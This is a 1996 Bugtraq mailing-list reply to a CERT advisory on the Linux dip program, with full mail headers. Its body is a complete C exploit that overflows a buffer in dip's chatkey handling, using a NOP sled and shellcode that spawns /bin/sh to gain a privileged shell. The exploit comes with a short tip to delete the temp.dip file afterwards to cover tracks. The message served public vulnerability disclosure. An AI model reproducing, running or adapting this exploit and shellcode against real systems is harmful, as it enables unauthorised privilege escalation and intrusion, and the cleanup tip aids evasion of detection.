From Helmut.Springer@RUS.Uni-Stuttgart.DE  Wed Jul 10 09:23:54 1996
Received: from artemis.rus.uni-stuttgart.de (artemis.rus.uni-stuttgart.de [129.69.18.28]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id JAA09688 for <best-of-security@suburbia.net>; Wed, 10 Jul 1996 09:22:45 +1000
Received: from info2.rus.uni-stuttgart.de (info2.rus.uni-stuttgart.de [129.69.18.15]) by artemis.rus.uni-stuttgart.de with SMTP id BAA10947
  (8.6.13/IDA-1.6 for <best-of-security@suburbia.net>); Wed, 10 Jul 1996 01:22:40 +0200
Received: by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03)
          id AA28647; Wed, 10 Jul 1996 01:22:28 +0200
Received: from artemis.rus.uni-stuttgart.de by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03)
          id AA64141; Wed, 10 Jul 1996 00:58:14 +0200
Received: from listserv.gmd.de (listserv.gmd.de [192.88.97.1]) by artemis.rus.uni-stuttgart.de with ESMTP id AAA10594
  (8.6.13/IDA-1.6); Wed, 10 Jul 1996 00:58:09 +0200
Received: from listserv.gmd.de by listserv.gmd.de (LSMTP for OpenVMS v1.1a) with SMTP id <9.52997349@listserv.gmd.de>; Wed, 10 Jul 1996 0:58:08 +0200
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 146889 for BUGTRAQ@NETSPACE.ORG; Tue, 9 Jul 1996 18:56:09
          -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org
          (8.7/8.6.12) with SMTP id SAA26503 for <BUGTRAQ@NETSPACE.ORG>; Tue, 9
          Jul 1996 18:55:40 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from argos.uniandes.edu.co (argos.uniandes.edu.co [157.253.1.15]) by
          netspace.org (8.7/8.6.12) with SMTP id RAA19031 for
          <BUGTRAQ@NETSPACE.ORG>; Tue, 9 Jul 1996 17:36:45 -0400
Received: by argos.uniandes.edu.co; id AA06266; Tue, 9 Jul 1996 16:31:33 -0400
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By:  Efrain Torres <e-torres@UNIANDES.EDU.CO>
Message-Id:  <Pine.3.89.9607091629.A4789-0100000@argos.uniandes.edu.co>
Date:         Tue, 9 Jul 1996 16:31:32 -0400
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
Sender: Helmut.Springer@RUS.Uni-Stuttgart.DE
From: Efrain Torres <e-torres@uniandes.edu.co>
Subject:      Re: CERT Advisory CA-96.13 - Vulnerability in the dip program
X-To:         CERT Advisory <cert-advisory@cert.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <199607091728.NAA06519@why.cert.org>

Just a note: don't forget to erase the temp.dip file when you run this
exploit.


/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strcpy(), strlen() */
#include <fcntl.h>
#include <sys/types.h>   /* u_char, u_long */
#include <sys/stat.h>

#define PATH_DIP "/usr/sbin/dip"

u_char shell[] = /* courtesy of avalon  ;) */
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

/* return the current stack pointer (i386 only) */
u_long esp(void)
{
  u_long sp;
  __asm__("movl %%esp, %0" : "=r" (sp));
  return sp;
}

int main(void)
{
  u_char buf[1024];
  u_long addr;
  int i, f;

  /* the script line starts with the "chatkey " command dip parses */
  strcpy((char *) buf, "chatkey ");
  addr = esp() - 192;
  /* fill the argument with the guessed return address ... */
  for (i=8; i<128+16; i+=4)
    *((u_long *) (buf+i)) = addr;
  /* ... followed by a NOP sled and the shellcode */
  for (i=128+16; i<512; i++)
    buf[i] = 0x90;
  for (i=0; i<(int) strlen((char *) shell); i++)
    buf[512+i] = shell[i];
  buf[512+i] = '\n';

  /* write the crafted script to temp.dip and hand it to dip */
  if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
    perror("temp.dip");
    exit(1);
  }
  write(f, buf, 512+i);
  close(f);

  execl(PATH_DIP, "dip", "temp.dip", (char *)0);
  perror(PATH_DIP);   /* only reached if execl() fails */
  return 1;
}

